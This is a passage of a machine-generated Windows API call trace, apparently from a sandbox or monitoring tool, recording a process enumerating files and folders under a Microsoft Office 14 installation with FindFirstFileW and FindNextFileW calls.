nFileSizeLow=0x290, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignedManagedObjects.cer", cAlternateFileName="SIGNED~1.CER")) returned 1 [0043.084] FindClose (in: hFindFile=0x3ed1480 | out: hFindFile=0x3ed1480) returned 1 [0043.084] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f02080 | out: hHeap=0x5f0000) returned 1 [0043.085] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x2ede6a4 | out: lpFindFileData=0x2ede6a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fancy", cAlternateFileName="")) returned 1 [0043.089] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\*", lpFindFileData=0x2ede428 | out: lpFindFileData=0x2ede428*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1300 [0043.093] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2ede428 | out: lpFindFileData=0x2ede428*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.093] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2ede428 | out: lpFindFileData=0x2ede428*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb486c900, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb486c900, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x16c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hierarchy.js", cAlternateFileName="HIERAR~1.JS")) returned 1 [0043.094] FindClose (in: hFindFile=0x3ed1300 | out: hFindFile=0x3ed1300) returned 1 [0043.109] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0043.109] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x2ede6a4 | out: lpFindFileData=0x2ede6a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fancy", cAlternateFileName="")) returned 0 [0043.109] FindClose (in: hFindFile=0x3ed1440 | out: hFindFile=0x3ed1440) returned 1 [0043.109] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0043.111] FindNextFileW (in: hFindFile=0x3ed1400, lpFindFileData=0x2ede920 | out: lpFindFileData=0x2ede920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Project Report Type", cAlternateFileName="PROJEC~1")) returned 0 [0043.111] FindClose (in: hFindFile=0x3ed1400 | out: hFindFile=0x3ed1400) returned 1 [0043.112] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0043.118] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x2edeb9c | out: lpFindFileData=0x2edeb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5b7f600, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb5b7f600, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x4f0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectToolsetIconImages.jpg", cAlternateFileName="PROJEC~3.JPG")) returned 1 [0043.123] FindClose (in: hFindFile=0x3ed1380 | out: hFindFile=0x3ed1380) returned 1 [0043.123] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fca0b8 | out: hHeap=0x5f0000) returned 1 [0043.124] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53907610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Welcome Tool", cAlternateFileName="WELCOM~1")) returned 1 [0043.781] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.782] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0043.782] FindNextFileW (in: hFindFile=0x3ed1140, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c5ccd00, ftCreationTime.dwHighDateTime=0x1cacf90, ftLastAccessTime.dwLowDateTime=0x6bf1cb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2c5ccd00, ftLastWriteTime.dwHighDateTime=0x1cacf90, nFileSizeHigh=0x0, nFileSizeLow=0x208560, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONENOTE.EXE", cAlternateFileName="")) returned 1 [0043.782] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\*", lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5133d8d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70c9f7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70c9f7b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.783] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5133d8d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70c9f7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70c9f7b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.783] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae54e300, ftCreationTime.dwHighDateTime=0x1c6e74b, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xae54e300, ftLastWriteTime.dwHighDateTime=0x1c6e74b, nFileSizeHigh=0x0, nFileSizeLow=0x330, dwReserved0=0x0, dwReserved1=0x0, cFileName="AMERITECH.NET.XML", cAlternateFileName="AMERIT~1.XML")) returned 1 [0043.785] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.786] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0043.786] FindNextFileW (in: hFindFile=0x3ed1140, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34af8800, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0x59a53950, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x34af8800, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0x5f190, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLPH.DLL", cAlternateFileName="")) returned 1 [0043.786] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\*", lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d27370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6ce49790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6ce49790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.787] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d27370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6ce49790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6ce49790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.787] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb180a100, ftCreationTime.dwHighDateTime=0x1ca10e6, ftLastAccessTime.dwLowDateTime=0x59d27370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb180a100, ftLastWriteTime.dwHighDateTime=0x1ca10e6, nFileSizeHigh=0x0, nFileSizeLow=0xfb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="PGLBL001.XML", cAlternateFileName="")) returned 1 [0043.789] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.790] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0043.790] FindNextFileW (in: hFindFile=0x3ed1140, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd651f080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x755a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDSBASE.DLL", cAlternateFileName="")) returned 1 [0043.790] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\*", lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5481df0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6f6b5a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa6f6b5a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.790] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5481df0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6f6b5a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa6f6b5a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.791] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97285f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x97285f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97285f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0043.791] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97285f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x97285f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97285f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0043.791] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97285f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x97285f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97285f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.791] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdcf7a00, ftCreationTime.dwHighDateTime=0x1ca60f4, ftLastAccessTime.dwLowDateTime=0x97748b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfdcf7a00, ftLastWriteTime.dwHighDateTime=0x1ca60f4, nFileSizeHigh=0x0, nFileSizeLow=0x517800, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3EN.DLL", cAlternateFileName="")) returned 1 [0043.791] FindClose (in: hFindFile=0x3ed13c0 | out: hFindFile=0x3ed13c0) returned 1 [0043.791] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0043.791] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa44929a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa44929a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa44929a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0043.791] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa44929a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa44929a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa44929a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0043.791] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa44929a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa44929a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa44929a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.791] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c189700, ftCreationTime.dwHighDateTime=0x1cba080, ftLastAccessTime.dwLowDateTime=0xa4551080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6c189700, ftLastWriteTime.dwHighDateTime=0x1cba080, nFileSizeHigh=0x0, nFileSizeLow=0xc6f390, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3FR.DLL", cAlternateFileName="")) returned 1 [0043.791] FindClose (in: hFindFile=0x3ed13c0 | out: hFindFile=0x3ed13c0) returned 1 [0043.791] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0043.791] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0043.792] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0043.792] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.792] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a86c00, ftCreationTime.dwHighDateTime=0x1ca60f4, ftLastAccessTime.dwLowDateTime=0x54f4210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6a86c00, ftLastWriteTime.dwHighDateTime=0x1ca60f4, nFileSizeHigh=0x0, nFileSizeLow=0x227c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3ES.DLL", cAlternateFileName="")) returned 1 [0043.792] FindClose (in: hFindFile=0x3ed13c0 | out: hFindFile=0x3ed13c0) returned 1 [0043.792] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0043.792] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69511700, ftCreationTime.dwHighDateTime=0x1c4a9a0, ftLastAccessTime.dwLowDateTime=0x97e6cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69511700, ftLastWriteTime.dwHighDateTime=0x1c4a9a0, nFileSizeHigh=0x0, nFileSizeLow=0x39cf3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3EN.LEX", cAlternateFileName="")) returned 1 [0043.793] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.793] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0043.793] FindNextFileW (in: hFindFile=0x3ed1140, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd656b340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROPMGR.DLL", cAlternateFileName="")) returned 1 [0043.793] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\*", lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59413f90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a1819b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a1819b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.796] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59413f90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a1819b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a1819b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.797] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcde5600, ftCreationTime.dwHighDateTime=0x1c458e1, ftLastAccessTime.dwLowDateTime=0x59413f90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcde5600, ftLastWriteTime.dwHighDateTime=0x1c458e1, nFileSizeHigh=0x0, nFileSizeLow=0xca60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPUB10.BDR", cAlternateFileName="")) returned 1 [0043.797] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.871] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0043.871] FindNextFileW (in: hFindFile=0x3ed1140, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82aef100, ftCreationTime.dwHighDateTime=0x1cab8a8, ftLastAccessTime.dwLowDateTime=0x5a7450f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82aef100, ftLastWriteTime.dwHighDateTime=0x1cab8a8, nFileSizeHigh=0x0, nFileSizeLow=0xddf78, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBCONV.DLL", cAlternateFileName="")) returned 1 [0043.871] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\*", lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x511e6c70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70959970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70959970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0043.873] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x511e6c70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70959970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70959970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.874] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e2a200, ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x5e953370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9e2a200, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCSBAR.POC", cAlternateFileName="")) returned 1 [0048.726] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7f556b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7f556b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.726] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f57cca0, 